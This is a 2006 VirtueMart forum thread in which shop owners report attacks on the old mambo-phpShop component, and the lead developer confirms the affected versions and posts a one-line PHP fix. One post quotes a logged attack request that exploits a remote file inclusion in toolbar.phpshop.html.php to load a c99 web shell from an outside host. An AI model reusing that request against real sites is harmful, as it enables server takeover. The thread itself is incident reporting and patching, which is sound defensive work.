Welcome, Guest. Please login or register.
Login with username, password and session length

VirtueMart 1.1.8 - [SECURITY RELEASE] is available! Read more....

  Advanced search

247038 Posts in 67506 Topics- by 258314 Members - Latest Member: aniketana
« previous next »
Pages: [1]   Go Down
Print
Author Topic: Are there known security risk in mamboPHPShop?  (Read 23692 times)
adtp
Newbie
*
Posts: 8


WWW
« on: August 18, 2006, 11:12:45 AM »
Hallo,
does anybody know if there are any security risk in the old mamboPHPShop? I ask because I found today same searchstring in logfiles like:
"/com_phpshop/" language:de
or
allinurl: com_phpshop

In the last hours it getting more and more.

Thanx
Torsten
Logged
current project SEDARO Möbel - language: german [Sitzwürfel - Sitzhocker & Wohnaccessoires]
adtp
Newbie
*
Posts: 8


WWW
« Reply #1 on: August 19, 2006, 12:17:14 PM »
Hallo,
they try to manipulate via the toolbar.phpshop.html.php an extract from the logfile

/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://deadbone.by.ru/c99.txt?cmd=id

My adminarea is protect by htaccess so nothing happens. Perhaps someone could say more if it is serious.

Torsten
Logged
current project SEDARO Möbel - language: german [Sitzwürfel - Sitzhocker & Wohnaccessoires]
scotoc
Newbie
*
Posts: 3
« Reply #2 on: August 19, 2006, 19:59:48 PM »
Quote from: adtp on August 18, 2006, 11:12:45 AM
Hallo,
does anybody know if there are any security risk in the old mamboPHPShop? I ask because I found today same searchstring in logfiles like:
"/com_phpshop/" language:de
or
allinurl: com_phpshop

In the last hours it getting more and more.

Thanx
Torsten


There is definitely problems. Last night our server got whacked bad. They gained entry via the phpshop toolbar on a customers site. They replaced over 175 website indexes. It appears they are running v1.1. Site is offline until I can further investigate and secure it.

On a related note how do I get them from 1.1 to whatever the latest is.
Logged
Soeren
Administrator
Hero Member
*
Posts: 3106


VirtueMart Lead Developer


WWW
« Reply #3 on: August 21, 2006, 04:01:14 AM »
Hello,

the security hole can be confirmed for all versions of mambo-phpShop prior to 1.2 - stable.

Versions affected: mambo-phpShop 1.1 - 1.2 RC2.
Versions NOT affected: mambo-phpShop 1.2 stable (all patch levels).

You are only in risk when register globals is turned on!

QUICK FIX
Find the file /administrator/components/com_phpshop/toolbar.phpshop.html.php and add

Code:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

right after the PHP bracket, so it looks like this:

Code:
<?php
defined'_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
/** ....
*/

I will send out a newsletter to notify everyone about the security risk.

ciao, Soeren
Logged
The future of eCommerce: VirtueMart & Joomla!
http://virtuemart.net
--
The VirtueMart project needs your help! To be able to continue this project please contribute your skills. Read more.
adtp
Newbie
*
Posts: 8


WWW
« Reply #4 on: August 21, 2006, 10:14:35 AM »
thank you
Logged
current project SEDARO Möbel - language: german [Sitzwürfel - Sitzhocker & Wohnaccessoires]
John
Newbie
*
Posts: 9
« Reply #5 on: August 21, 2006, 10:27:08 AM »
Can you tell me if you can upgrade from phpshop 1.1 to 1.2?
Logged
Pages: [1]   Go Up
Print
« previous next »
Jump to: